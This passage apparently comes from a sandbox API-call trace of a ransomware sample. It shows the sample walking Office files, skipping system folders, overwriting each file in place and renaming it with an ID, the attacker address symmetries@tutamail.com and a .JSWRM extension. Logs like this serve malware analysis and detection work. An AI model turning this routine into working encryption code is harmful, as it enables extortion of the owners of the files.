lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0121.291] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.291] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0121.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0121.291] CloseHandle (hObject=0x238) returned 1 [0121.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0121.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0121.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0121.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0121.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0121.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0121.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0121.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0121.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0121.293] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_COL.HXT", cAlternateFileName="SKYPEF~1.HXT")) returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2=".") returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="..") returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="...") returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="windows") returned -1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="recovery") returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="perflogs") returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="documents and settings") returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="system volume information") returned -1 [0121.293] lstrcmpiW (lpString1="SKYPEFB_COL.HXT", lpString2="msocache") returned 1 [0121.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0121.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0121.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0121.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0121.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0121.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0121.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0121.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0121.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0121.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.294] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=207) returned 1 [0121.294] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0121.294] ReadFile (in: hFile=0x238, lpBuffer=0x24b510, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0121.295] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.295] WriteFile (in: hFile=0x238, lpBuffer=0x24b510*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0121.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0121.295] CloseHandle (hObject=0x238) returned 1 [0121.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0121.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0121.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0121.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0121.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0121.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0121.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0121.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0121.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0121.297] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_F_COL.HXK", cAlternateFileName="SKYPEF~4.HXK")) returned 1 [0121.297] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2=".") returned 1 [0121.297] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="..") returned 1 [0121.297] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="...") returned 1 [0121.297] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="windows") returned -1 [0121.298] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="recovery") returned 1 [0121.298] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="perflogs") returned 1 [0121.298] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="documents and settings") returned 1 [0121.298] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.298] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="system volume information") returned -1 [0121.298] lstrcmpiW (lpString1="SKYPEFB_F_COL.HXK", lpString2="msocache") returned 1 [0121.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0121.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0121.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0121.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0121.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.299] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0121.299] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0121.299] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.300] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.300] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0121.300] CloseHandle (hObject=0x238) returned 1 [0121.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0121.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0121.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0121.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0121.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0121.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0121.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.300] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0121.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0121.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0121.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0121.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.301] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_K_COL.HXK", cAlternateFileName="SKYPEF~1.HXK")) returned 1 [0121.301] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2=".") returned 1 [0121.301] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="..") returned 1 [0121.301] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="...") returned 1 [0121.302] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="windows") returned -1 [0121.302] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="recovery") returned 1 [0121.302] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="perflogs") returned 1 [0121.302] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="documents and settings") returned 1 [0121.302] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.302] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="system volume information") returned -1 [0121.302] lstrcmpiW (lpString1="SKYPEFB_K_COL.HXK", lpString2="msocache") returned 1 [0121.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0121.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0121.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0121.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0121.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0121.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.303] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0121.303] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0121.303] ReadFile (in: hFile=0x238, lpBuffer=0x209170, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209170*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.304] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.304] WriteFile (in: hFile=0x238, lpBuffer=0x209170*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209170*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0121.304] CloseHandle (hObject=0x238) returned 1 [0121.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0121.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.304] RtlAllocateHeap 